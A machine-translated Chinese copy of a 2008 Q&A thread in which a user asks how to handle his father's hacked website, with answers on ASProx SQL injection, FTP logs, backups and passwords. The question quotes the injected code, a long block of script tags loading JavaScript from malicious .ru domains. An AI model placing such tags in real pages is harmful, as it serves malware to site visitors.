我的网站被黑了......我该怎么办?

时间:2008-08-05 23:55:26

标签: security cracking

我父亲今天打电话给我,说他们去他的网站的人有168种病毒试图下载到他们的电脑上。他根本不是技术人员,用WYSIWYG编辑器构建了整个东西。

我打开他的网站并查看了源代码,在关闭HTML标记之前,源代码底部有一行Javascript包含。他们包含了这个文件(以及其他许多文件):http://www.98hs.ru/js.js< - 在您访问该网址之前关闭JAVASCRIPT。

所以我现在评论它。事实证明他的FTP密码是一个普通的字典单词六个字母长,所以我们认为这是如何被黑客攻击。我们已经将他的密码更改为一个8位以上的非单词字符串(因为他是一个狩猎的人,所以他不会用密码短语)。

我做了一个whois on 98hs.ru,发现它是从智利的服务器托管的。实际上还有一个与之相关的电子邮件地址,但我严重怀疑这个人是罪魁祸首。可能只是其他一些被黑客入侵的网站...

我不知道在这一点上做什么,因为我以前从未处理过这类事情。有人有什么建议吗?

他通过webhost4life.com使用普通的jane un-secured ftp。我甚至没有看到在他们的网站上 sftp的方法。我在想他的用户名和密码被拦截了吗?

因此,为了使其与社区更相关,您应采取哪些步骤/最佳做法来保护您的网站免遭黑客入侵?

为了记录,这里是“神奇地”添加到他的文件中的代码行(并且不在他的计算机上的文件中 - 我已经将其注释掉,只是为了绝对确定它赢了'在这个页面做任何事情,虽然我确信杰夫会防范这个:)

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->

8 个答案:

答案 0 :(得分:14)

我知道这在游戏中有点晚了,但是在一个已知属于ASPRox机器人复苏的网站列表中提到了JavaScript所提到的网址,这些网站已于六月开始(至少我们是得到标记)。有关它的一些细节提到如下:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

关于这一点的令人讨厌的事实是,数据库中的每个varchar类型字段都被“感染”以吐出对此URL的引用,其中浏览器获取一个小的iframe,将其转换为机器人。可以在此处找到基本的SQL修复程序:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

但可怕的是,病毒会在系统表中查找要感染的值,并且许多共享主机方案也会为其客户共享数据库空间。所以很可能甚至不是你父亲的网站被感染了,但是他的托管集群中的其他人的网站编写了一些糟糕的代码并打开了SQL注入攻击的大门。

如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该SQL代码的链接来修复整个系统。您可以修复自己受影响的数据库表,但很可能是感染的机器人会再次通过该漏洞并感染整个批次。

希望这能为您提供更多信息。

编辑:还有一个想法,如果他使用其中一个主机在线设计工具来构建他的网站,所有这些内容可能都在一个列中,并被感染了。

答案 1 :(得分:14)

尝试尽可能多地收集信息。查看主持人是否可以为您提供显示您帐户所有FTP连接的日志。您可以使用它们来查看它是否是用于进行更改并可能获得IP地址的FTP连接。

如果您使用的是预装软件,如Wordpress,Drupal或其他任何您未编码的软件,则上传代码中可能存在允许进行此类修改的漏洞。如果是自定义构建,请仔细检查允许用户上传文件或修改现有文件的任何位置。

第二件事是按原样转储网站并检查所有内容以进行其他修改。它可能只是一个单独的修改,但如果他们通过FTP进入,谁知道那里还有什么。

将您的网站恢复到已知的良好状态,如果需要,请升级到最新版本。

您还必须考虑到一定程度的回报。损害是否值得追踪此人,或者这是你生活和学习并使用更强密码的东西?

答案 2 :(得分:5)

你提到你的爸爸正在使用网站发布工具。

如果发布工具从他的计算机发布到服务器,则可能是他的本地文件是干净的,并且他只需要重新发布到服务器。

他应该看看他的服务器是否有不同于普通FTP的登录方法,但是......这不是很安全,因为它通过互联网将密码作为明文发送。

答案 3 :(得分:3)

使用六个字的密码,他可能被强行逼迫。这比他的ftp被截获的可能性更大,但也可能是这样。

从更强的密码开始。 (8个字符仍然相当弱)

查看此互联网security blog的链接是否有用。

答案 4 :(得分:2)

网站是否只是纯静态HTML?即他没有设法编写一个上传页面,允许任何人驾驶上传受损的脚本/页面?

为什么不询问webhost4life是否有任何可用的FTP日志并向他们报告问题。你永远不会知道,他们可能非常善于接受,并准确地找到你发生的事情?

我为共享主机工作,我们总是欢迎这样的报告,并且通常可以查明确切的攻击向量,并建议客户出错的地方。

答案 5 :(得分:0)

拔下网络服务器而不关闭它以避免关机脚本。通过另一台计算机分析硬盘作为数据驱动器,看看你是否可以通过日志文件和那种性质的东西来确定罪魁祸首。验证代码是否安全,然后从备份中恢复。

答案 6 :(得分:0)

这发生在我最近的一个客户端上,该客户端是在ipower上托管的。我不确定你的托管环境是否基于Apache,但是如果确定要仔细检查你没有创建的.htaccess文件,特别是在webroot上面和图像目录内部,因为它们往往会在那里注入一些肮脏同样(他们根据他们在推荐中的来源重定向人员)。还要检查您为未编写的代码创建的任何内容。

答案 7 :(得分:-1)

我们显然是从同一个家伙被黑了!或者机器人,在我们的例子中。他们在一些古老的经典ASP网站上使用URL注入SQL,而这些ASP网站已经没有了。我们发现攻击IP并在IIS中阻止它们。现在我们必须重构所有旧的ASP。 因此,我的建议是首先查看IIS日志,以查找问题是否在您站点的代码或服务器配置中。